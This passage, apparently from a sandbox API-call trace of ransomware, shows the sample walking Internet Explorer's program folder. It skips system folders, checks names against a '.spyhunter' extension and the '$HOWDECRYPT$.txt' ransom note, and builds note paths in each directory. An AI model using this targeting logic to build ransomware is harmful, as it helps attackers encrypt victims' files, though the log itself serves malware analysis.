(Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1508) returned 0x2c310e0 [0095.292] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0095.292] lstrcmpiW (lpString1="jsdbgui.dll.mui", lpString2="Windows") returned -1 [0095.292] lstrlenW (lpString="Windows") returned 7 [0095.292] lstrcmpiW (lpString1="jsdbgui.dll.mui", lpString2="$Recycle.bin") returned 1 [0095.292] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.292] lstrcmpiW (lpString1="jsdbgui.dll.mui", lpString2="System Volume Information") returned -1 [0095.292] lstrlenW (lpString="System Volume Information") returned 25 [0095.292] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsdbgui.dll.mui") returned 60 [0095.292] StrStrIW (lpFirst="jsdbgui.dll.mui", lpSrch=".spyhunter") returned 0x0 [0095.292] lstrcmpW (lpString1="jsdbgui.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.292] lstrcmpW (lpString1="jsdbgui.dll.mui", lpString2="_uninstalling_.png") returned 1 [0095.292] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsdbgui.dll.mui") returned 60 [0095.292] GetProcessHeap () returned 0x2c0000 [0095.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xba) returned 0x32d810 [0095.292] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1510) returned 0x2c310e0 [0095.293] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0095.293] lstrcmpiW (lpString1="jsdebuggeride.dll.mui", lpString2="Windows") returned -1 [0095.293] lstrlenW (lpString="Windows") returned 7 [0095.293] lstrcmpiW (lpString1="jsdebuggeride.dll.mui", lpString2="$Recycle.bin") returned 1 [0095.293] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.293] lstrcmpiW (lpString1="jsdebuggeride.dll.mui", lpString2="System Volume Information") returned -1 [0095.293] lstrlenW (lpString="System Volume Information") returned 25 [0095.293] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsdebuggeride.dll.mui") returned 66 [0095.293] StrStrIW (lpFirst="jsdebuggeride.dll.mui", lpSrch=".spyhunter") returned 0x0 [0095.293] lstrcmpW (lpString1="jsdebuggeride.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.293] lstrcmpW (lpString1="jsdebuggeride.dll.mui", lpString2="_uninstalling_.png") returned 1 [0095.293] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsdebuggeride.dll.mui") returned 66 [0095.293] GetProcessHeap () returned 0x2c0000 [0095.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc6) returned 0x358d60 [0095.293] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1518) returned 0x2c310e0 [0095.293] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0095.293] lstrcmpiW (lpString1="JSProfilerCore.dll.mui", lpString2="Windows") returned -1 [0095.293] lstrlenW (lpString="Windows") returned 7 [0095.293] lstrcmpiW (lpString1="JSProfilerCore.dll.mui", lpString2="$Recycle.bin") returned 1 [0095.293] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.293] lstrcmpiW (lpString1="JSProfilerCore.dll.mui", lpString2="System Volume Information") returned -1 [0095.293] lstrlenW (lpString="System Volume Information") returned 25 [0095.293] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\JSProfilerCore.dll.mui") returned 67 [0095.293] StrStrIW (lpFirst="JSProfilerCore.dll.mui", lpSrch=".spyhunter") returned 0x0 [0095.294] lstrcmpW (lpString1="JSProfilerCore.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.294] lstrcmpW (lpString1="JSProfilerCore.dll.mui", lpString2="_uninstalling_.png") returned 1 [0095.294] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\JSProfilerCore.dll.mui") returned 67 [0095.294] GetProcessHeap () returned 0x2c0000 [0095.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x358610 [0095.294] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1520) returned 0x2c310e0 [0095.294] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0095.294] lstrcmpiW (lpString1="jsprofilerui.dll.mui", lpString2="Windows") returned -1 [0095.294] lstrlenW (lpString="Windows") returned 7 [0095.294] lstrcmpiW (lpString1="jsprofilerui.dll.mui", lpString2="$Recycle.bin") returned 1 [0095.294] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.294] lstrcmpiW (lpString1="jsprofilerui.dll.mui", lpString2="System Volume Information") returned -1 [0095.294] lstrlenW (lpString="System Volume Information") returned 25 [0095.294] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsprofilerui.dll.mui") returned 65 [0095.294] StrStrIW (lpFirst="jsprofilerui.dll.mui", lpSrch=".spyhunter") returned 0x0 [0095.294] lstrcmpW (lpString1="jsprofilerui.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.294] lstrcmpW (lpString1="jsprofilerui.dll.mui", lpString2="_uninstalling_.png") returned 1 [0095.294] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsprofilerui.dll.mui") returned 65 [0095.294] GetProcessHeap () returned 0x2c0000 [0095.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x358200 [0095.294] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1528) returned 0x2c310e0 [0095.294] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0 [0095.294] FindClose (in: hFindFile=0x335f20 | out: hFindFile=0x335f20) returned 1 [0095.295] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\$HOWDECRYPT$.txt") returned 61 [0095.295] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\$HOWDECRYPT$.txt") returned 61 [0095.295] GetProcessHeap () returned 0x2c0000 [0095.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xbc) returned 0x32da68 [0095.295] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1530) returned 0x2c310e0 [0095.296] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0095.296] lstrcmpiW (lpString1="hmmapi.dll", lpString2="Windows") returned -1 [0095.296] lstrlenW (lpString="Windows") returned 7 [0095.296] lstrcmpiW (lpString1="hmmapi.dll", lpString2="$Recycle.bin") returned 1 [0095.296] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.296] lstrcmpiW (lpString1="hmmapi.dll", lpString2="System Volume Information") returned -1 [0095.296] lstrlenW (lpString="System Volume Information") returned 25 [0095.296] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\hmmapi.dll") returned 49 [0095.296] StrStrIW (lpFirst="hmmapi.dll", lpSrch=".spyhunter") returned 0x0 [0095.296] lstrcmpW (lpString1="hmmapi.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.296] lstrcmpW (lpString1="hmmapi.dll", lpString2="_uninstalling_.png") returned 1 [0095.296] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\hmmapi.dll") returned 49 [0095.296] GetProcessHeap () returned 0x2c0000 [0095.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xa4) returned 0x33d160 [0095.296] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1538) returned 0x2c310e0 [0095.296] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0095.296] lstrcmpiW (lpString1="ie8props.propdesc", lpString2="Windows") returned -1 [0095.296] lstrlenW (lpString="Windows") returned 7 [0095.296] lstrcmpiW (lpString1="ie8props.propdesc", lpString2="$Recycle.bin") returned 1 [0095.296] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.296] lstrcmpiW (lpString1="ie8props.propdesc", lpString2="System Volume Information") returned -1 [0095.296] lstrlenW (lpString="System Volume Information") returned 25 [0095.296] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\ie8props.propdesc") returned 56 [0095.296] StrStrIW (lpFirst="ie8props.propdesc", lpSrch=".spyhunter") returned 0x0 [0095.296] lstrcmpW (lpString1="ie8props.propdesc", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.297] lstrcmpW (lpString1="ie8props.propdesc", lpString2="_uninstalling_.png") returned 1 [0095.297] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\ie8props.propdesc") returned 56 [0095.297] GetProcessHeap () returned 0x2c0000 [0095.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb2) returned 0x34cc98 [0095.297] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1540) returned 0x2c310e0 [0095.297] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0095.297] lstrcmpiW (lpString1="iecompat.dll", lpString2="Windows") returned -1 [0095.297] lstrlenW (lpString="Windows") returned 7 [0095.297] lstrcmpiW (lpString1="iecompat.dll", lpString2="$Recycle.bin") returned 1 [0095.297] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.297] lstrcmpiW (lpString1="iecompat.dll", lpString2="System Volume Information") returned -1 [0095.297] lstrlenW (lpString="System Volume Information") returned 25 [0095.297] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\iecompat.dll") returned 51 [0095.297] StrStrIW (lpFirst="iecompat.dll", lpSrch=".spyhunter") returned 0x0 [0095.297] lstrcmpW (lpString1="iecompat.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.297] lstrcmpW (lpString1="iecompat.dll", lpString2="_uninstalling_.png") returned 1 [0095.297] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\iecompat.dll") returned 51 [0095.297] GetProcessHeap () returned 0x2c0000 [0095.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xa8) returned 0x33d210 [0095.297] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1548) returned 0x2c310e0 [0095.297] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0095.297] lstrcmpiW (lpString1="iedvtool.dll", lpString2="Windows") returned -1 [0095.297] lstrlenW (lpString="Windows") returned 7 [0095.297] lstrcmpiW (lpString1="iedvtool.dll", lpString2="$Recycle.bin") returned 1 [0095.298] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.298] lstrcmpiW (lpString1="iedvtool.dll", lpString2="System Volume Information") returned -1 [0095.298] lstrlenW (lpString="System Volume Information") returned 25 [0095.298] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\iedvtool.dll") returned 51 [0095.298] StrStrIW (lpFirst="iedvtool.dll", lpSrch=".spyhunter") returned 0x0 [0095.298] lstrcmpW (lpString1="iedvtool.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.298] lstrcmpW (lpString1="iedvtool.dll", lpString2="_uninstalling_.png") returned 1 [0095.298] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\iedvtool.dll") returned 51 [0095.298] GetProcessHeap () returned 0x2c0000 [0095.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xa8) returned 0x33d2c0 [0095.298] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1550) returned 0x2c310e0 [0095.298] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0095.298] lstrcmpiW (lpString1="ieinstal.exe", lpString2="Windows") returned -1 [0095.298] lstrlenW (lpString="Windows") returned 7 [0095.298] lstrcmpiW (lpString1="ieinstal.exe", lpString2="$Recycle.bin") returned 1 [0095.298] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.298] lstrcmpiW (lpString1="ieinstal.exe", lpString2="System Volume Information") returned -1 [0095.298] lstrlenW (lpString="System Volume Information") returned 25 [0095.298] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\ieinstal.exe") returned 51 [0095.298] StrStrIW (lpFirst="ieinstal.exe", lpSrch=".spyhunter") returned 0x0 [0095.298] lstrcmpW (lpString1="ieinstal.exe", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.298] lstrcmpW (lpString1="ieinstal.exe", lpString2="_uninstalling_.png") returned 1 [0095.298] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\ieinstal.exe") returned 51 [0095.298] GetProcessHeap () returned 0x2c0000 [0095.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xa8) returned 0x33d370 [0095.299] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1558) returned 0x2c310e0 [0095.299] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0095.299] lstrcmpiW (lpString1="ielowutil.exe", lpString2="Windows") returned -1 [0095.299] lstrlenW (lpString="Windows") returned 7 [0095.299] lstrcmpiW (lpString1="ielowutil.exe", lpString2="$Recycle.bin") returned 1 [0095.299] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.299] lstrcmpiW (lpString1="ielowutil.exe", lpString2="System Volume Information") returned -1 [0095.299] lstrlenW (lpString="System Volume Information") returned 25 [0095.299] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\ielowutil.exe") returned 52 [0095.299] StrStrIW (lpFirst="ielowutil.exe", lpSrch=".spyhunter") returned 0x0 [0095.299] lstrcmpW (lpString1="ielowutil.exe", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.299] lstrcmpW (lpString1="ielowutil.exe", lpString2="_uninstalling_.png") returned 1 [0095.299] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\ielowutil.exe") returned 52 [0095.299] GetProcessHeap () returned 0x2c0000 [0095.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xaa) returned 0x329e90 [0095.299] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1560) returned 0x2c310e0 [0095.299] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0095.299] lstrcmpiW (lpString1="ieproxy.dll", lpString2="Windows") returned -1 [0095.299] lstrlenW (lpString="Windows") returned 7 [0095.299] lstrcmpiW (lpString1="ieproxy.dll", lpString2="$Recycle.bin") returned 1 [0095.299] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.299] lstrcmpiW (lpString1="ieproxy.dll", lpString2="System Volume Information") returned -1 [0095.299] lstrlenW (lpString="System Volume Information") returned 25 [0095.299] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\ieproxy.dll") returned 50 [0095.299] StrStrIW (lpFirst="ieproxy.dll", lpSrch=".spyhunter") returned 0x0 [0095.300] lstrcmpW (lpString1="ieproxy.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.300] lstrcmpW (lpString1="ieproxy.dll", lpString2="_uninstalling_.png") returned 1 [0095.300] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\ieproxy.dll") returned 50 [0095.300] GetProcessHeap () returned 0x2c0000 [0095.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xa6) returned 0x33d420 [0095.300] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1568) returned 0x2c310e0 [0095.300] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0095.300] lstrcmpiW (lpString1="IEShims.dll", lpString2="Windows") returned -1 [0095.300] lstrlenW (lpString="Windows") returned 7 [0095.300] lstrcmpiW (lpString1="IEShims.dll", lpString2="$Recycle.bin") returned 1 [0095.300] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.300] lstrcmpiW (lpString1="IEShims.dll", lpString2="System Volume Information") returned -1 [0095.300] lstrlenW (lpString="System Volume Information") returned 25 [0095.300] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\IEShims.dll") returned 50 [0095.300] StrStrIW (lpFirst="IEShims.dll", lpSrch=".spyhunter") returned 0x0 [0095.300] lstrcmpW (lpString1="IEShims.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.300] lstrcmpW (lpString1="IEShims.dll", lpString2="_uninstalling_.png") returned 1 [0095.300] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\IEShims.dll") returned 50 [0095.300] GetProcessHeap () returned 0x2c0000 [0095.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xa6) returned 0x33d4d0 [0095.300] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1570) returned 0x2c310e0 [0095.300] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0095.300] lstrcmpiW (lpString1="iexplore.exe", lpString2="Windows") returned -1 [0095.300] lstrlenW (lpString="Windows") returned 7 [0095.301] lstrcmpiW (lpString1="iexplore.exe", lpString2="$Recycle.bin") returned 1 [0095.301] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.301] lstrcmpiW (lpString1="iexplore.exe", lpString2="System Volume Information") returned -1 [0095.301] lstrlenW (lpString="System Volume Information") returned 25 [0095.301] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\iexplore.exe") returned 51 [0095.301] StrStrIW (lpFirst="iexplore.exe", lpSrch=".spyhunter") returned 0x0 [0095.301] lstrcmpW (lpString1="iexplore.exe", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.301] lstrcmpW (lpString1="iexplore.exe", lpString2="_uninstalling_.png") returned 1 [0095.301] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\iexplore.exe") returned 51 [0095.301] GetProcessHeap () returned 0x2c0000 [0095.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xa8) returned 0x33d580 [0095.301] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1578) returned 0x2c310e0 [0095.301] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0095.301] lstrcmpiW (lpString1="jsdbgui.dll", lpString2="Windows") returned -1 [0095.301] lstrlenW (lpString="Windows") returned 7 [0095.301] lstrcmpiW (lpString1="jsdbgui.dll", lpString2="$Recycle.bin") returned 1 [0095.301] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.301] lstrcmpiW (lpString1="jsdbgui.dll", lpString2="System Volume Information") returned -1 [0095.301] lstrlenW (lpString="System Volume Information") returned 25 [0095.301] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\jsdbgui.dll") returned 50 [0095.301] StrStrIW (lpFirst="jsdbgui.dll", lpSrch=".spyhunter") returned 0x0 [0095.301] lstrcmpW (lpString1="jsdbgui.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.301] lstrcmpW (lpString1="jsdbgui.dll", lpString2="_uninstalling_.png") returned 1 [0095.301] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\jsdbgui.dll") returned 50 [0095.301] GetProcessHeap () returned 0x2c0000 [0095.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xa6) returned 0x33d630 [0095.302] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1580) returned 0x2c310e0 [0095.302] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0095.302] lstrcmpiW (lpString1="jsdebuggeride.dll", lpString2="Windows") returned -1 [0095.302] lstrlenW (lpString="Windows") returned 7 [0095.302] lstrcmpiW (lpString1="jsdebuggeride.dll", lpString2="$Recycle.bin") returned 1 [0095.302] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.302] lstrcmpiW (lpString1="jsdebuggeride.dll", lpString2="System Volume Information") returned -1 [0095.302] lstrlenW (lpString="System Volume Information") returned 25 [0095.302] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\jsdebuggeride.dll") returned 56 [0095.302] StrStrIW (lpFirst="jsdebuggeride.dll", lpSrch=".spyhunter") returned 0x0 [0095.302] lstrcmpW (lpString1="jsdebuggeride.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.302] lstrcmpW (lpString1="jsdebuggeride.dll", lpString2="_uninstalling_.png") returned 1 [0095.302] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\jsdebuggeride.dll") returned 56 [0095.302] GetProcessHeap () returned 0x2c0000 [0095.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb2) returned 0x34c8d8 [0095.302] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1588) returned 0x2c310e0 [0095.302] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0095.302] lstrcmpiW (lpString1="JSProfilerCore.dll", lpString2="Windows") returned -1 [0095.302] lstrlenW (lpString="Windows") returned 7 [0095.302] lstrcmpiW (lpString1="JSProfilerCore.dll", lpString2="$Recycle.bin") returned 1 [0095.302] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.302] lstrcmpiW (lpString1="JSProfilerCore.dll", lpString2="System Volume Information") returned -1 [0095.302] lstrlenW (lpString="System Volume Information") returned 25 [0095.302] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\JSProfilerCore.dll") returned 57 [0095.303] StrStrIW (lpFirst="JSProfilerCore.dll", lpSrch=".spyhunter") returned 0x0 [0095.303] lstrcmpW (lpString1="JSProfilerCore.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.303] lstrcmpW (lpString1="JSProfilerCore.dll", lpString2="_uninstalling_.png") returned 1 [0095.303] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\JSProfilerCore.dll") returned 57 [0095.303] GetProcessHeap () returned 0x2c0000 [0095.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb4) returned 0x34c998 [0095.303] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1590) returned 0x2c310e0 [0095.303] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0095.303] lstrcmpiW (lpString1="jsprofilerui.dll", lpString2="Windows") returned -1 [0095.303] lstrlenW (lpString="Windows") returned 7 [0095.303] lstrcmpiW (lpString1="jsprofilerui.dll", lpString2="$Recycle.bin") returned 1 [0095.303] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.303] lstrcmpiW (lpString1="jsprofilerui.dll", lpString2="System Volume Information") returned -1 [0095.303] lstrlenW (lpString="System Volume Information") returned 25 [0095.303] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\jsprofilerui.dll") returned 55 [0095.303] StrStrIW (lpFirst="jsprofilerui.dll", lpSrch=".spyhunter") returned 0x0 [0095.303] lstrcmpW (lpString1="jsprofilerui.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.303] lstrcmpW (lpString1="jsprofilerui.dll", lpString2="_uninstalling_.png") returned 1 [0095.303] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\jsprofilerui.dll") returned 55 [0095.303] GetProcessHeap () returned 0x2c0000 [0095.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb0) returned 0x32a000 [0095.303] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1598) returned 0x2c310e0 [0095.303] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0095.304] lstrcmpiW (lpString1="msdbg2.dll", lpString2="Windows") returned -1 [0095.304] lstrlenW (lpString="Windows") returned 7 [0095.304] lstrcmpiW (lpString1="msdbg2.dll", lpString2="$Recycle.bin") returned 1 [0095.304] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.304] lstrcmpiW (lpString1="msdbg2.dll", lpString2="System Volume Information") returned -1 [0095.304] lstrlenW (lpString="System Volume Information") returned 25 [0095.304] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\msdbg2.dll") returned 49 [0095.304] StrStrIW (lpFirst="msdbg2.dll", lpSrch=".spyhunter") returned 0x0 [0095.304] lstrcmpW (lpString1="msdbg2.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.304] lstrcmpW (lpString1="msdbg2.dll", lpString2="_uninstalling_.png") returned 1 [0095.304] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\msdbg2.dll") returned 49 [0095.304] GetProcessHeap () returned 0x2c0000 [0095.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xa4) returned 0x33d6e0 [0095.304] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15a0) returned 0x2c310e0 [0095.304] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0095.304] lstrcmpiW (lpString1="pdm.dll", lpString2="Windows") returned -1 [0095.304] lstrlenW (lpString="Windows") returned 7 [0095.304] lstrcmpiW (lpString1="pdm.dll", lpString2="$Recycle.bin") returned 1 [0095.304] lstrlenW (lpString="$Recycle.bin") returned 12 [0095.304] lstrcmpiW (lpString1="pdm.dll", lpString2="System Volume Information") returned -1 [0095.304] lstrlenW (lpString="System Volume Information") returned 25 [0095.304] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\pdm.dll") returned 46 [0095.304] StrStrIW (lpFirst="pdm.dll", lpSrch=".spyhunter") returned 0x0 [0095.304] lstrcmpW (lpString1="pdm.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0095.305] lstrcmpW (lpString1="pdm.dll", lpString2="_uninstalling_.png") returned 1 [0095.305] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\pdm.dll") returned 46 [0095.305] GetProcessHeap () returned 0x2c0000 [0095.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x9e) returned 0x330e90 [0095.305] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15a8) returned 0x2c310e0 [0095.305] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0095.305] lstrcmpiW (lpString1="SIGNUP", lpString2="Windows") returned -1 [0095.305] lstrlenW (lpString="Windows") returned 7 [0095.305] lstrcmpiW 